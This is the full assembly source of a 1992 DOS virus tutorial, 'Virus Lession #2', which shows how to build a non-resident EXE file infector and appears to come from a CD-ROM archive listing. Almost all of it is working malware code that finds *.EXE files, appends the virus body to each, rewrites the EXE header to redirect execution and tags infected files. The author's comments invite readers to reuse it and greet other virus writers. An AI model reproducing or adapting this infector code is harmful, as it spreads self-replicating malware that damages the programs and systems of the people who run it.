home *** CD-ROM | disk | FTP | other *** search
- ;
-
- ; Virus Lession #2 'How to make a non-resident EXE infector'
-
- ;
-
- ; (c) 1992 Tormentor // Demoralized Youth
-
- ;
-
- ; Well, I had not time to comment this code as much as I wanted to,
-
- ; but here you are.
-
- ; What can be hard to understand is the .EXE header changes, but if
-
- ; you look at the description on the header (ex: Norton guide Tech. Ref)
-
- ; you'll understand...
-
- ; Anyway, feel free to use this example and if you have any questions
-
- ; or anything call my board: Swedish Virus Labratory +46-3191-9393
-
- ;
-
- ; Greetings to all virus-writers!
-
- ;
-
- ; /Tormentor
-
- ;
-
-
-
-
-
-
-
- .model tiny
-
- .radix 16
-
- .code
-
-
-
- Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
-
-
-
- org 100
-
-
-
- Virus_Start: call where_we_are
-
-
-
- where_we_are: pop si
-
-
-
- sub si,where_we_are-Virus_Start
-
-
-
- mov ax,es
-
- add ax,10
-
- add ax,cs:[si+Exe_header-Virus_Start+16]
-
- push ax
-
- push cs:[si+Exe_header-Virus_Start+14]
-
-
-
- push ds
-
- push cs
-
- pop ds
-
-
-
- mov ah,1a
-
- mov dx,offset Own_dta-Virus_Start
-
- add dx,si
-
- int 21
-
-
-
- mov ah,4e ; We start to look for a *.EXE file
-
- look4victim: mov dx,offset file_match-Virus_Start
-
- add dx,si
-
- int 21
-
-
-
- jnc cont2
-
- jmp no_victim_found ; If no *.EXE files was found.
-
-
-
- cont2: mov ax,3d02
-
- mov dx,Own_dta-Virus_Start+1e
-
- add dx,si
-
- int 21
-
-
-
- jnc cont1
-
- jmp cant_open_file
-
-
-
- cont1: xchg ax,bx
-
-
-
- mov ah,3f
-
- mov cx,1c
-
- mov dx,offset Exe_header-Virus_Start
-
- add dx,si
-
- int 21
-
-
-
- jc read_error
-
-
-
- cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
-
- jnz no_exe ; !!! Some EXEs starts with ZM !!!
-
- cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
-
- jz infected
-
-
-
- mov ax,4202 ; Go EOF
-
- xor cx,cx
-
- xor dx,dx
-
- int 21
-
-
-
- push dx
-
- push ax
-
-
-
- mov ah,40 ; Write virus to EOF.
-
- mov cx,Virus_Lenght
-
- mov dx,si
-
- int 21
-
-
-
- mov ax,4202 ; Get NEW filelenght.
-
- xor cx,cx
-
- xor dx,dx
-
- int 21
-
-
-
- mov cx,200
-
- div cx
-
- inc ax
-
- mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
-
- mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
-
-
-
- pop ax
-
- pop dx
-
-
-
- mov cx,10
-
- div cx
-
- sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
-
- mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
-
- mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
-
-
-
- mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
-
-
-
- mov ax,4200 ; Position file-pointer to begin of file
-
- xor cx,cx
-
- xor dx,dx
-
- int 21
-
-
-
- mov ah,40 ; Write header
-
- mov cx,1c
-
- mov dx,offset Exe_header-Virus_Start
-
- add dx,si
-
- int 21
-
-
-
- jc write_error
-
-
-
- no_exe:
-
- infected:
-
- mov ah,3e
-
- int 21
-
-
-
- Sick_or_EXE: mov ah,4f
-
- jmp look4victim
-
-
-
- write_error: ; Here you can test whats went wrong.
-
- read_error: ; This is just for debugging purpose.
-
- cant_open_file: ; These entries are equal to eachother
-
- no_victim_found: ; but could be changed if you need to test something.
-
-
-
- pop ds
-
- retf
-
-
-
- file_match db '*.EXE',0 ; Pattern to search for.
-
- ; Don't forget to end with 0 !
-
-
-
- Exe_header db 16 DUP(0)
-
- dw 0fff0 ; Adjustment just for this COM-file.
-
- db 4 DUP(0)
-
-
-
- notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
-
- db 'Rather first in hell, than second in heaven.'
-
-
-
- Own_Dta db 02bh DUP(0)
-
-
-
- Virus_End EQU $
-
-
-
- end Virus_Start
-
- �
